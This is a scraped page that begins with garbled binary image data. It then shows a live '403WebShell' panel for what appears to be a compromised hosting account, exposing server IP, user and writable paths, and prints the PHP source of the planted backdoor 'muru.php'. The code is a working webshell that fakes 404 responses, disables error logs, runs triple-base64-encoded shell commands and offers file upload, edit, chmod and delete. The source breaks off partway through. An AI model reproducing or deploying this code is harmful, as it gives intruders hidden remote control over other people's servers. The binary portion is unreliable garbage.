JFIFXX    $.' ",#(7),01444'9=82<.342  2!!22222222222222222222222222222222222222222222222222"4 ,PG"Z_4˷kjزZ,F+_z,© zh6٨icfu#ډb_N?wQ5-~I8TK<5oIv-k_U_~bMdӜUHh?]EwQk{_}qFW7HTՑYF?_'ϔ_Ջt=||I 6έ"D/[k9Y8ds|\Ҿp6Ҵ].6znopM[mei$[soᘨ˸ nɜG-ĨUycP3.DBli;hjx7Z^NhN3u{:jx힞#M&jL P@_ P&o89@Sz6t7#Oߋ s}YfTlmrZ)'Nk۞pw\Tȯ?8`Oi{wﭹW[r Q4F׊3m&L=h3z~#\l :F,j@ ʱwQT8"kJO6֚l}R>ډK]y&p}b;N1mr$|7>e@BTM*-iHgD) Em|ؘbҗaҾt4oG*oCNrPQ@z,|?W[0:n,jWiEW$~/hp\?{(0+Y8rΟ+>S-SVN;}s?. w9˟<Mq4Wv'{)01mBVW[8/< %wT^5b)iM pgN&ݝVO~qu9 !J27$O-! :%H ـyΠM=t{!S oK8txA& j0 vF Y|y ~6@c1vOpIg4lODL Rcj_uX63?nkWyf;^*B @~a`Eu+6L.ü>}y}_O6͐:YrGXkGl^w~㒶syIu! W XN7BVO!X2wvGRfT#t/?%8^WaTGcLMI(J1~8?aT ]ASE(*E} 2#I/׍qz^t̔bYz4xt){ OH+(EA&NXTo"XC')}Jzp ~5}^+6wcQ|LpdH}(.|kc4^"Z?ȕ a<L!039C EuCFEwç ;n?*oB8bʝ'#RqfM}7]s2tcS{\icTx;\7KPʇ Z O-~c>"?PEO8@8GQgaՎ󁶠䧘_%#r>1zaebqcPѵn#L =׀t L7`VA{C:ge@w1 Xp3c3ġpM"'-@n4fGB3DJ8[JoߐgK)ƛ$ 83+ 6ʻ SkI*KZlT _`?KQKdB`s}>`*>,*@JdoF*弝O}ks]yߘc1GV<=776qPTtXԀ!9*44Tހ3XΛex46YD  BdemDa\_l,G/֌7Y](xTt^%GE4}bTڹ;Y)BQu>J/J ⮶.XԄjݳ+Ed r5_D1 o Bx΢#<W8R6@gM. drD>(otU@x=~v2 ӣdoBd3eO6㣷ݜ66YQz`S{\P~z m5{J/L1xO\ZFu>ck#&:`$ai>2ΔloF[hlEܺΠk:)` $[69kOw\|8}ބ:񶐕IA1/=2[,!.}gN#ub ~݊}34qdELc$"[qU硬g^%B zrpJru%v\h1Yne`ǥ:gpQM~^Xi `S:V29.PV?Bk AEvw%_9CQwKekPؠ\;Io d{ ߞoc1eP\ `E=@KIRYK2NPlLɀ)&eB+ь( JTx_?EZ }@ 6U뙢طzdWIn` D噥[uV"G&Ú2g}&m?ċ"Om# {ON"SXNeysQ@FnVgdX~nj]J58up~.`r\O,ư0oS _Ml4kv\JSdxSW<AeIX$Iw:Sy›R9Q[,5;@]%u@ *rolbI  +%m:͇ZVủθau,RW33 dJeTYE.Mϧ-oj3+yy^cVO9NV\nd1 !͕_)av;թMlWR1)ElP;yوÏu 3k5Pr6<⒲l!˞*u־n!l:UNW %Chx8vL'X@*)̮ˍ D-M+JUkvK+x8cY?Ԡ~3mo|u@[XeYC\Kpx8oCC&N~3-H MXsu<`~"WL$8ξ3a)|:@m\^`@ҷ)5p+6p%i)P Mngc#0AruzRL+xSS?ʮ}()#tmˇ!0}}y$6Lt;$ʳ{^6{v6ķܰgVcnn ~zx«,2u?cE+ȘH؎%Za)X>uWTzNyosFQƤ$*&LLXL)1" LeOɟ9=:tZcŽY?ӭVwv~,Yrۗ|yGaFC.+ v1fήJ]STBn5sW}y$~z'c 8  ,! pVNSNNqy8z˱A4*'2n<s^ǧ˭PJޮɏUGLJ*#i}K%,)[z21z ?Nin1?TIR#m-1lA`fT5+ܐcq՝ʐ,3f2Uեmab#ŠdQy>\)SLYw#.ʑf ,"+w~N'cO3FN<)j&,- љ֊_zSTǦw>?nU仆Ve0$CdrP m׈eXmVu L.bֹ [Դaզ*\y8Է:Ez\0KqC b̘cөQ=0YsNS.3.Oo:#v7[#߫ 5܎LEr49nCOWlG^0k%;YߝZǓ:S#|}y,/kLd TA(AI$+I3;Y*Z}|ӧOdv..#:nf>>ȶITX 8y"dR|)0=n46ⲑ+ra ~]R̲c?6(q;5% |uj~z8R=XIV=|{vGj\gcqz؋%Mߍ1y#@f^^>N#x#۹6Y~?dfPO{P4Vu1E1J *|%JN`eWuzk M6q t[ gGvWIGu_ft5j"Y:Tɐ*; e54q$C2d} _SL#mYpO.C;cHi#֩%+) ӍƲVSYźg |tj38r|V1#;.SQA[S#`n+$$I P\[@s(EDzP])8G#0B[ىXIIq<9~[Z멜Z⊔IWU&A>P~#dp]9 "cP Md?٥Ifتuk/F9c*9Ǎ:ØFzn*@|Iށ9N3{'['ͬҲ4#}!V Fu,,mTIkv C7vB6kT91*l '~ƞFlU'M ][ΩũJ_{iIn$L jOdxkza۪#EClx˘oVɞljr)/,߬hL#^Lф,íMƁe̩NBLiLq}(q6IçJ$WE$:=#(KBzђ xlx?>Պ+>W,Ly!_DŌlQ![ SJ1ƐY}b,+Loxɓ)=yoh@꥟/Iѭ=Py9 ۍYӘe+pJnϱ?V\SO%(t =?MR[Șd/ nlB7j !;ӥ/[-A>dNsLj ,ɪv=1c.SQO3UƀܽE̻9GϷD7(}Ävӌ\y_0[w <΍>a_[0+LF.޺f>oNTq;y\bՃyjH<|q-eɏ_?_9+PHp$[uxK wMwNی'$Y2=qKBP~Yul:[<F12O5=d]Ysw:ϮEj,_QXz`H1,#II dwrP˂@ZJVy$\y{}^~[:NߌUOdؾe${p>G3cĖlʌ ת[`ϱ-WdgIig2 }s ؤ(%#sS@~3XnRG~\jc3vӍLM[JBTs3}jNʖW;7ç?=XF=-=qߚ#='c7ڑWI(O+=:uxqe2zi+kuGR0&eniT^J~\jyp'dtGsO39* b#Ɋ p[BwsT>d4ۧsnvnU_~,vƜJ1s QIz)(lv8MU=;56Gs#KMP=LvyGd}VwWBF'à ?MHUg2 !p7Qjڴ=ju JnA suMeƆҔ!)'8Ϣٔޝ(Vpצ֖d=ICJǠ{qkԭ߸i@Ku|p=..*+xz[Aqġ#s2aƊRR)*HRsi~a &fMP-KL@ZXy'x{}Zm+:)) IJ-iu ܒH'L(7yGӜq j 6ߌg1go,kرtY?W,pefOQS!K۟cҒA|սj>=⬒˧L[ ߿2JaB~Ru:Q] 0H~]7ƼI(}cq 'ήETq?fabӥvr )o-Q_'ᴎoK;Vo%~OK *bf:-ťIR`B5!RB@ï u ̯e\_U_ gES3QTaxU<~c?*#]MW,[8Oax]1bC|踤Plw5V%){t<d50iXSUm:Z┵i"1^B-PhJ&)O*DcWvM)}Pܗ-q\mmζZ-l@}aE6F@&Sg@ݚM ȹ 4#p\HdYDoH"\..RBHz_/5˘6KhJRPmƶim3,#ccoqa)*PtRmk7xDE\Y閣_X<~)c[[BP6YqS0%_;Àv~| VS؇ 'O0F0\U-d@7SJ*z3nyPOm~P3|Yʉr#CSN@ ƮRN)r"C:: #qbY. 6[2K2uǦHYRQMV G$Q+.>nNHq^ qmMVD+-#*U̒ p욳u:IBmPV@Or[b= 1UE_NmyKbNOU}the`|6֮P>\2PVIDiPO;9rmAHGWS]J*_G+kP2KaZH'KxWMZ%OYDRc+o?qGhmdSoh\D|:WUAQc yTq~^H/#pCZTI1ӏT4"ČZ}`w#*,ʹ 0i課Om*da^gJ݅{le9uF#Tֲ̲ٞC"qߍ ոޑo#XZTp@ o8(jdxw],f`~|,s^f1t|m򸄭/ctr5s79Q4H1꠲BB@l9@C+wpxu£Yc9?`@#omHs2)=2.ljg9$YS%*LRY7Z,*=䷘$armoϰUW.|rufIGwtZwo~5 YյhO+=8fF)W7L9lM̘·Y֘YLf큹pRF99.A "wz=E\Z'a 2Ǚ#;'}G*l^"q+2FQ hjkŦ${ޮ-T٭cf|3#~RJt$b(R(rdx >U b&9,>%E\ Άe$'q't*אެb-|dSBOO$R+H)܎K1m`;J2Y~9Og8=vqD`K[F)k[1m޼cn]skz$@)!I x՝"v9=ZA=`Ɠi :E)`7vI}dYI_ o:obo 3Q&D&2= Ά;>hy.*ⅥSӬ+q&j|UƧ}J0WW< ۋS)jQRjƯrN)Gű4Ѷ(S)Ǣ8iW52No˓ ۍ%5brOnL;n\G=^UdI8$&h'+(cȁ߫klS^cƗjԌEꭔgFȒ@}O*;evWVYJ\]X'5ղkFb 6Ro՜mi Ni>J?lPmU}>_Z&KKqrIDՉ~q3fL:Se>E-G{L6pe,8QIhaXaUA'ʂs+טIjP-y8ۈZ?J$WP Rs]|l(ԓsƊio(S0Y 8T97.WiLc~dxcE|2!XKƘਫ਼$((6~|d9u+qd^389Y6L.I?iIq9)O/뚅OXXVZF[یgQLK1RҖr@v#XlFНyS87kF!AsM^rkpjPDyS$Nqnxҍ!Uf!ehi2m`YI9r6 TFC}/y^Η5d'9A-J>{_l+`A['յϛ#w:݅%X}&PStQ"-\縵/$ƗhXb*yBS;Wջ_mcvt?2}1;qSdd~u:2k52R~z+|HE!)Ǟl7`0<,2*Hl-x^'_TVgZA'j ^2ΪN7t?w x1fIzC-ȖK^q;-WDvT78Z hK(P:Q- 8nZ܃e貾<1YT<,"6{/ ?͟|1:#gW>$dJdB=jf[%rE^il:BxSּ1հ,=*7 fcG#q eh?27,!7x6nLC4x},GeǝtC.vS F43zz\;QYC,6~;RYS/6|25vTimlv& nRh^ejRLGf? ۉҬܦƩ|Ȱ>3!viʯ>vオX3e_1zKȗ\qHS,EW[㺨uch⍸O}a>q6n6N6qN ! 1AQaq0@"2BRb#Pr3C`Scst$4D%Td ?Na3mCwxAmqmm$4n淿t'C"wzU=D\R+wp+YT&պ@ƃ3ޯ?AﶂaŘ@-Q=9Dռѻ@MVP܅G5fY6# ?0UQ,IX(6ڵ[DIMNލc&υj\XR|,4 jThAe^db#$]wOӪ1y%LYm뭛CUƃߜ}Cy1XνmF8jI]HۺиE@Ii;r8ӭVFՇ| &?3|xBMuSGe=Ӕ#BE5GY!z_eqр/W>|-Ci߇t1ޯќdR3ug=0 5[?#͏qcfH{ ?u=??ǯ}ZzhmΔBFTWPxs}G93 )gGR<>r h$'nchPBjJҧH -N1N?~}-q!=_2hcMlvY%UE@|vM2.Y[|y"EïKZF,ɯ?,q?vM 80jx";9vk+ ֧ ȺU?%vcVmA6Qg^MA}3nl QRNl8kkn'(M7m9وq%ޟ*h$Zk"$9: ?U8Sl,,|ɒxH(ѷGn/Q4PG%Ա8N! &7;eKM749R/%lc>x;>C:th?aKXbheᜋ^$Iհ hr7%F$EFdt5+(M6tÜUU|zW=aTsTgdqPQb'm1{|YXNb P~F^F:k6"j! Ir`1&-$Bevk:y#ywI0x=D4tUPZHڠ底taP6b>xaQ# WeFŮNjpJ* mQN*I-*ȩFg3 5Vʊɮa5FO@{NX?H]31Ri_uѕ 0 F~:60p͈SqX#a5>`o&+<2D: ڝ$nP*)N|yEjF5ټeihyZ >kbHavh-#!Po=@k̆IEN@}Ll?jO߭ʞQ|A07xwt!xfI2?Z<ץTcUj]陎Ltl }5ϓ$,Omˊ;@OjEj(ا,LXLOЦ90O .anA7j4 W_ٓzWjcBy՗+EM)dNg6y1_xp$Lv:9"zpʙ$^JԼ*ϭo=xLj6Ju82AH3$ٕ@=Vv]'qEz;I˼)=ɯx /W(Vp$ mu񶤑OqˎTr㠚xsrGCbypG1ߠw e8$⿄/M{*}W]˷.CK\ުx/$WPwr |i&}{X >$-l?-zglΆ(FhvS*b߲ڡn,|)mrH[a3ר[13o_U3TC$(=)0kgP u^=4 WYCҸ:vQרXàtkm,t*^,}D* "(I9R>``[~Q]#afi6l86:,ssN6j"A4IuQ6E,GnHzSHOuk5$I4ؤQ9@CwpBGv[]uOv0I4\yQѸ~>Z8Taqޣ;za/SI:ܫ_|>=Z8:SUIJ"IY8%b8H:QO6;7ISJҌAά3>cE+&jf$eC+z;V rʺmyeaQf&6ND.:NTvm<- uǝ\MvZYNNT-A>jr!SnO 13Ns%3D@`ܟ 1^c< aɽ̲Xë#w|ycW=9I*H8p^(4՗karOcWtO\ƍR8'KIQ?5>[}yUײ -h=% qThG2)"ו3]!kB*pFDlA,eEiHfPs5H:Փ~H0DتDIhF3c2E9H5zԑʚiX=:mxghd(v׊9iSOd@0ڽ:p5h-t&Xqӕ,ie|7A2O%PEhtjY1wЃ!  ࢽMy7\a@ţJ 4ȻF@o̒?4wx)]P~u57X 9^ܩU;Iꭆ 5 eK27({|Y׎ V\"Z1 Z}(Ǝ"1S_vE30>p; ΝD%xW?W?vo^Vidr[/&>~`9Why;R ;;ɮT?r$g1KACcKl:'3 cﳯ*"t8~l)m+U,z`(>yJ?h>]vЍG*{`;y]IT ;cNUfo¾h/$|NS1S"HVT4uhǜ]v;5͠x'C\SBplh}N ABx%ޭl/Twʽ]D=Kžr㻠l4SO?=k M: cCa#ha)ѐxcsgPiG{+xQI= zԫ+ 8"kñj=|c yCF/*9жh{ ?4o kmQNx;Y4膚aw?6>e]Qr:g,i"ԩA*M7qB?ӕFhV25r[7 Y }LR}*sg+xr2U=*'WSZDW]WǞ<叓{$9Ou4y90-1'*D`c^o?(9uݐ'PI& fJݮ:wSjfP1F:X H9dԯ˝[_54 }*;@ܨ ðynT?ןd#4rGͨH1|-#MrS3G3).᧏3vz֑r$G"`j 1tx0<ƆWh6y6,œGagAyb)hDß_mü gG;evݝnQ C-*oyaMI><]obD":GA-\%LT8c)+y76oQ#*{(F⽕y=rW\p۩cA^e6KʐcVf5$'->ՉN"F"UQ@fGb~#&M=8טJNu9D[̤so~ G9TtW^g5y$bY'سǴ=U-2 #MCt(i lj@Q 5̣i*OsxKf}\M{EV{υƇ);HIfeLȣr2>WIȂ6ik 5YOxȺ>Yf5'|H+98pjn.OyjY~iw'l;s2Y:'lgꥴ)o#'SaaKZ m}`169n"xI *+ }FP"l45'ZgE8?[X7(.Q-*ތL@̲v.5[=t\+CNܛ,gSQnH}*FG16&:t4ُ"Ạ$b |#rsaT ]ӽDP7ո0y)e$ٕvIh'QEAm*HRI=: 4牢) %_iNݧl] NtGHL ɱg<1V,J~ٹ"KQ 9HS9?@kr;we݁]I!{ @G["`J:n]{cAEVʆ#U96j#Ym\qe4hB7Cdv\MNgmAyQL4uLjj9#44tl^}LnR!t±]rh6ٍ>yҏNfU  Fm@8}/ujb9he:AyծwGpΧh5l}3p468)Udc;Us/֔YX1O2uqs`hwgr~{ RmhN؎*q 42*th>#E#HvOq}6e\,Wk#Xb>p}դ3T5†6[@Py*n|'f֧>lư΂̺SU'*qp_SM 'c6m ySʨ;MrƋmKxo,GmPAG:iw9}M(^V$ǒѽ9| aJSQarB;}ٻ֢2%Uc#gNaݕ'v[OY'3L3;,p]@S{lsX'cjwk'a.}}& dP*bK=ɍ!;3ngΊUߴmt'*{,=SzfD Ako~Gaoq_mi}#mPXhύmxǍ΂巿zfQc|kc?WY$_Lvl߶c`?ljݲˏ!V6UЂ(A4y)HpZ_x>eR$/`^'3qˏ-&Q=?CFVR DfV9{8gnh(P"6[D< E~0<@`G6Hгcc cK.5DdB`?XQ2ٿyqo&+1^ DW0ꊩG#QnL3c/x 11[yxპCWCcUĨ80me4.{muI=f0QRls9f9~fǨa"@8ȁQ#cicG$Gr/$W(WV"m7[mAmboD j۳ l^kh׽ # iXnveTka^Y4BNĕ0 !01@Q"2AaPq3BR?@4QT3,㺠W[=JKϞ2r^7vc:9 EߴwS#dIxu:Hp9E! V 2;73|F9Y*ʬFDu&y؟^EAA(ɩ^GV:ݜDy`Jr29ܾ㝉[E;FzxYGUeYC v-txIsםĘqEb+P\ :>iC';k|zرny]#ǿbQw(r|ӹs[D2v-%@;8<a[\o[ϧwI!*0krs)[J9^ʜp1) "/_>o<1AEy^C`x1'ܣnps`lfQ):lb>MejH^?kl3(z:1ŠK&?Q~{ٺhy/[V|6}KbXmn[-75q94dmc^h X5G-}دBޟ |rtMV+]c?-#ڛ^ǂ}LkrOu>-Dry D?:ޞUǜ7V?瓮"#rչģVR;n/_ ؉vݶe5db9/O009G5nWJpA*r9>1.[tsFnQ V 77R]ɫ8_0<՜IFu(v4Fk3E)N:yڮeP`1}$WSJSQNjٺ޵#lј(5=5lǏmoWv-1v,Wmn߀$x_DȬ0¤#QR[Vkzmw"9ZG7'[=Qj8R?zf\a=OU*oBA|G254 p.w7  &ξxGHp B%$gtЏ򤵍zHNuЯ-'40;_3 !01"@AQa2Pq#3BR?ʩcaen^8F<7;EA{EÖ1U/#d1an.1ě0ʾRh|RAo3m3 % 28Q yφHTo7lW>#i`qca m,B-j݋'mR1Ήt>Vps0IbIC.1Rea]H64B>o]($Bma!=?B KǾ+Ծ"nK*+[T#{EJSQs5:U\wĐf3܆&)IԆwE TlrTf6Q|Rh:[K zc֧GC%\_a84HcObiؖV7H )*ģK~Xhչ04?0 E<}3#u? |gS6ꊤ|I#Hڛ աwX97Ŀ%SLy6č|Fa 8b$sקhb9RAu7˨pČ_\*w묦F 4D~f|("mNKiS>$d7SlA/²SL|6N}S˯g]6; #. 403WebShell
403Webshell
Server IP : 185.232.14.244  /  Your IP : 216.73.216.56
Web Server : LiteSpeed
System : Linux sg-nme-web1278.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64
User : u166342113 ( 166342113)
PHP Version : 8.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u166342113/domains/dholera-project.ravgroup.org/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/u166342113/domains/dholera-project.ravgroup.org/public_html/muru.php
<?php

session_start();
set_time_limit(0);
error_reporting(0);
@ini_set('error_log',null);
@ini_set('log_errors',0);
@http_response_code(404);
//Shin Code - Created 15 July 2023 - Recode By uaaya616@gmail.com
$password = '$2y$10$oetZdV3C.OsDe9snrsvo2uqltiCzFzGKU1uxvikmbIeaHSvHNI/Kq';
function login()
{
?>
<!DOCTYPE html>
<html lang="en">
<head>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <link href="https://fonts.googleapis.com/css2?family=Ubuntu+Mono" rel="stylesheet">
</head>
<style type="text/css">
* {
        font-family: Ubuntu Mono;
}
input {
        border:#000;
        outline:none;
}
</style>
<body>
        <form method="post">
                <input type="password" name="password" placeholder="&nbsp;Password...">
        </form>
</body>
</html>
<?php exit();
        }
function logout()
{
unset($_SESSION['login']); ?>
        <script>alert("You Successfully Logout !!\nGood bye");window.location='http://<?= $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] ?>'</script>
<?php
}
if (!isset($_SESSION['login'])) {
if (empty($password) || (isset($_POST['password']) && password_verify($_POST['password'], $password))) {
        $_SESSION['login'] = true;
        } else {
                login();
        }
}
?>
<?php
function getFileDetails($path)
{
        $folders = [];
        $files = [];

        try {
                $items = @scandir($path);
if (!is_array($items)) {
        throw new Exception('Failed to scan directory');
}

foreach ($items as $item) { if ($item == '.' || $item == '..') {continue;}

        $itemPath = $path . '/' . $item;
        $itemDetails = ['name' => $item, 'type' => is_dir($itemPath) ? 'Folder' : 'File','size' => is_dir($itemPath) ? '' : formatSize(filesize($itemPath)), 'permission' => substr(sprintf('%o', fileperms($itemPath)), -4),];
if (is_dir($itemPath)) {
        $folders[] = $itemDetails;
        } else {
                $files[] = $itemDetails;
        }
}

return array_merge($folders, $files);
        }
catch (Exception $e) {
        return 'None';
        }
}

function formatSize($size)
{
        $units = array('B', 'KB', 'MB', 'GB', 'TB');
                $i = 0;
        while ($size >= 1024 && $i < 4) {
                $size /= 1024;
                $i++;
        }
return round($size, 2) . ' ' . $units[$i];
}
//cmd fitur
function ekse($komend) {
        if (!function_exists("proc_open")) {
                die("proc_open function disabled !");
        } elseif (!function_exists("base64_decode")) {
                die("base64_decode function disabled !");
        }
        $komen = base64_decode(base64_decode(base64_decode($komend)));
if (strpos($komend, "2>&1") === false) {
        $komen = base64_decode(base64_decode(base64_decode($komend)))." 2>&1";
}
$tod = @proc_open($komen, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $pipes);
echo "<div class='row'><div class='card bg-dark text-info'><pre>┌──(<b class='text-primary'>".@get_current_user()."㉿kali</b>)-[<b class='text-light'>~".getcwd()."</b>]
└─<b class='text-primary'>$</b> <a class='text-light'>$komen</a><br>".htmlspecialchars(stream_get_contents($pipes[1]))."</pre></div></div>";
}
//buat scan root
function exe_root($set,$sad) {
        $x = "preg_match";
        $xx = "2>&1";
        if (!$x("/".$xx."/i", $set)) {
                $set = $set." ".$xx;
        }
        $a = "function_exists";
        $b = "proc_open";
        $c = "htmlspecialchars";
        $d = "stream_get_contents";
        if ($a($b)) {
                $ps = $b($set, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $pink,$sad);
                return $d($pink[1]);
        } else {
                return "proc_open function is disabled !";
        }
}
function readFileContent($file)
        {
return file_get_contents($file);
        }
function saveFileContent($file)
        {
if (isset($_POST['content'])) {
        return file_put_contents($file, $_POST['content']) !== false;
                }
        return false;
}
//upfile
function uploadFile($targetDirectory)
{
if (isset($_FILES['file'])) {
        $currentDirectory = getCurrentDirectory();
        $targetFile = $targetDirectory . '/' . basename($_FILES['file']['name']);
if ($_FILES['file']['size'] === 0) {
        return '<script>Swal.fire({title: "Oops..",text: "Silahkan pilih file dulu !",icon: "info"});</script>';
        } else {
if (move_uploaded_file($_FILES['file']['tmp_name'], $targetFile)) {
                return '<script>Swal.fire({title: "Good...",text: "Upload file sukses",icon: "success"});</script>';
                        } else {
                return '<script>Swal.fire({title: "Fail...",text: "Upload file gagal !",icon: "error"});</script>';
                }
        }
        return '';
        }
}
//dir
function changeDirectory($path)
{
if ($path === '..') {
        @chdir('..');
                } else {
                @chdir($path);
        }
}

function getCurrentDirectory()
{
return realpath(getcwd());
}

//open file juga folder
function getLink($path, $name)
{
if (is_dir($path)) {
                return '<a href="?d=' . urlencode($path) . '">' . $name . '</a>';
                } elseif (is_file($path)) {
                return '<a href="?d=' . urlencode(dirname($path)) . '&amp;read=' . urlencode($path) . '">' . $name . '</a>';
        }
}
function getDirectoryArray($path)
{
$directories = explode('/', $path);
$directoryArray = [];
$currentPath = '';
foreach ($directories as $directory) {
if (!empty($directory)) {
$currentPath .= '/' . $directory;
$directoryArray[] = ['path' => $currentPath,'name' => $directory,];
        }
}
return $directoryArray;
}


function showBreadcrumb($path)
{
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
?>
<?php foreach ($paths as $id => $pat) { ?>
<?php if ($pat == '' && $id == 0) { ?><i class="fad fa-folders"></i>&nbsp;:&nbsp;<a href="?d=/" class="text-light">/</a>
<?php } ?>
<?php if ($pat == '') {
continue;
} ?>
<?php $linkPath = implode('/', array_slice($paths, 0, $id + 1)); ?>
<a href="?d=<?php echo urlencode($linkPath); ?>"><?php echo $pat; ?></a>/
<?php } ?>
<?php
}

//tabel biar keren
function showFileTable($path)
{
        $fileDetails = getFileDetails($path);
?>
<div class="table-responsive mt-3">
        <table class="table table-sm table-dark table-hover">
                <thead class="thead-dark text-light text-center">
                <tr>
                        <th>Name</th>
                        <th>Type</th>
                        <th>Size</th>
                        <th>Permission</th>
                        <th>Actions</th>
                </tr>
                </thead>
                <?php if (is_array($fileDetails)) { ?>
                <?php foreach ($fileDetails as $fileDetail) { ?>
                <tbody>
                        <tr>
                                <td><i class="fad fa-file"></i>&nbsp;<?php echo getLink($path . '/' . $fileDetail['name'], $fileDetail['name']); ?></td>
                                <td class="text-center"><?php echo $fileDetail['type']; ?></td>
                                <td class="text-center"><?php echo $fileDetail['size']; ?></td>
                                <td class="text-center"><?php $permissionColor = is_writable($path . '/' . $fileDetail['name']) ? 'green' : 'red';?><span style="color: <?php echo $permissionColor; ?>"><?php echo $fileDetail['permission']; ?></span></td>
                                <td class="text-center"><?php if ($fileDetail['type'] === 'File') { ?>
                                <div class="btn-group">
                                        <a class="btn btn-outline-light btn-sm" href="?d=<?php echo urlencode($path); ?>&edit=<?php echo urlencode($path . '/' . $fileDetail['name']); ?>"><i class="fad fa-edit"></i></a><a class="btn btn-outline-light btn-sm" href="?d=<?php echo urlencode($path); ?>&rename=<?php echo urlencode($fileDetail['name']); ?>"><i class="fad fa-pen"></i></a><a class="btn btn-outline-light btn-sm" href="?d=<?php echo urlencode($path); ?>&chmod=<?php echo urlencode($fileDetail['name']); ?>"><i class="fad fa-user-cog"></i></a><a class="btn btn-outline-light btn-sm" href="?d=<?php echo urlencode($path); ?>&delete=<?php echo urlencode($fileDetail['name']); ?>"><i class="fad fa-trash-alt"></i></a>
                                </div>
                                <?php } ?><?php if ($fileDetail['type'] === 'Folder') { ?>
                                <div class="btn-group">
                                        <a class="btn btn-outline-light btn-sm" href="?d=<?php echo urlencode($path); ?>&rename=<?php echo urlencode($fileDetail['name']); ?>"><i class="fad fa-pen"></i></a><a class="btn btn-outline-light btn-sm" href="?d=<?php echo urlencode($path); ?>&chmod=<?php echo urlencode($fileDetail['name']); ?>"><i class="fad fa-user-cog"></i></a><a class="btn btn-outline-light btn-sm" href="?d=<?php echo urlencode($path); ?>&delete=<?php echo urlencode($fileDetail['name']); ?>"><i class="fad fa-trash-alt"></i></a>
                                </div>
                                <?php } ?>
                                </td>
                        </tr>
                        <?php } ?><?php } else { ?>
                        <script>Swal.fire({title: "Oops...",text: "Directory ini tidak dapat di baca",icon: "error"});</script>
                        <tr>
                                <td colspan="5">None</td>
                        </tr>
                        <?php } ?>
                </tbody>
        </table>
</div>
<?php
}
//chmod
function changePermission($path)
{
if (!file_exists($path)) {
        return '<script>Swal.fire({title: "Oops...",text: "File atau direktori tidak ada",icon: "info"});</script>';
}

$permission = isset($_POST['permission']) ? $_POST['permission'] : '';

if ($permission === '') {
        return '<script>Swal.fire({title: "Oops...",text: "Gagal nilai permission",icon: "info"});</script>';
}

if (!is_dir($path) && !is_file($path)) {
        return '<script>Swal.fire({title: "Oops...",text: "Tidak dapat mengubah chmod. Hanya direktori dan file yang dapat diubah chmodnya.",icon: "info"});</script>';
}

$parsedPermission = intval($permission, 8);
if ($parsedPermission === 0) {
        return '<script>Swal.fire({title: "Oops...",text: "Gagal nilai permission",icon: "info"});</script>';
}

if (chmodRecursive($path, $parsedPermission)) {
        return '<script>Swal.fire({title: "Good...",text: "Chmod berhasil diubah",icon: "success"});</script>';
} else {
        return '<script>Swal.fire({title: "Fail...",text: "Chmod gagal di ubah",icon: "error"});</script>';
        }
}


function chmodRecursive($path, $permission)
{
if (is_dir($path)) {
        $items = scandir($path);
if ($items === false) {
        return false;
}

foreach ($items as $item) {
if ($item == '.' || $item == '..') {
        continue;
}

$itemPath = $path . '/' . $item;

if (is_dir($itemPath)) {
if (!chmod($itemPath, $permission)) {
        return false;
}

if (!chmodRecursive($itemPath, $permission)) {
                return false;
                }
        } else {
        if (!chmod($itemPath, $permission)) {
                return false;
                }
        }
}
} else {
        if (!chmod($path, $permission)) {
                return false;
        }
}
        return true;
}

//rename
function renameFile($oldName, $newName)
{
if (file_exists($oldName)) {
$directory = dirname($oldName);
$newPath = $directory . '/' . $newName;
if (rename($oldName, $newPath)) {
                return '<script>Swal.fire({title: "Good...",text: "Folder / file berhasil di ganti nama",icon: "success"});</script>';
        } else {
                return '<script>Swal.fire({title: "Fail...",text: "Gagal ganti nama folder",icon: "error"});</script>';
                }
        }
}

//delete
function deleteFile($file)
{
if (file_exists($file)) {
if (unlink($file)) {
return '<script>Swal.fire({title: "Good...",text: "File berhasil di hapus",icon: "success"});</script>';
        } else {
                return '<script>Swal.fire({title: "Fail...",text: "Gagal ganti nama file",icon: "error"});</script>';
                }
        } else {
                return '<script>Swal.fire({title: "Oops...",text: "File tidak ada",icon: "info"});</script>';
        }
}

function deleteFolder($folder)
{
if (is_dir($folder)) {
$files = glob($folder . '/*');
foreach ($files as $file) {
is_dir($file) ? deleteFolder($file) : unlink($file);
}
if (rmdir($folder)) {
        return '<script>Swal.fire({title: "Good...",text: "Folder berhasil di hapus",icon: "success"});</script>';
} else {
        return '<script>Swal.fire({title: "Fail...",text: "Gagal hapus folder",icon: "error"});</script>';
        }
} else {
return '<script>Swal.fire({title: "Oops...",text: "Folder tidak ada",icon: "info"});</script>';
        }
}
//main logic directory
$currentDirectory = getCurrentDirectory();
$errorMessage = '';
$responseMessage = '';

if (isset($_GET['d'])) {
        changeDirectory($_GET['d']);
        $currentDirectory = getCurrentDirectory();
}
//edit
if (isset($_GET['edit'])) {
        $file = $_GET['edit'];
        $content = readFileContent($file);
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $saved = saveFileContent($file);
if ($saved) {
        $responseMessage = '<script>Swal.fire({title: "Good...",text: "Sukses edit file",icon: "success"});</script>';
        } else {
        $errorMessage = '<script>Swal.fire({title: "Fail...",text: "Gagal edit file",icon: "error"});</script>';
                }
        }
}

if (isset($_GET['chmod'])) {
        $file = $_GET['chmod'];
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $responseMessage = changePermission($file);
        }
}

if (isset($_POST['upload'])) {
        $responseMessage = uploadFile($currentDirectory);
}

if (isset($_GET['rename'])) {
        $file = $_GET['rename'];
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $newName = $_POST['new_name'];
if (is_file($file) || is_dir($file)) {
        $responseMessage = renameFile($file, $newName);
        } else {
        $errorMessage = '<script>Swal.fire({title: "Oops...",text: "File / folder tidak ada",icon: "info"});</script>';
                }
        }
}

if (isset($_GET['delete'])) {
        $file = $_GET['delete'];
if ($_SERVER['REQUEST_METHOD'] === 'GET') {
        $currentDirectory = getCurrentDirectory();
if (is_file($file)) {
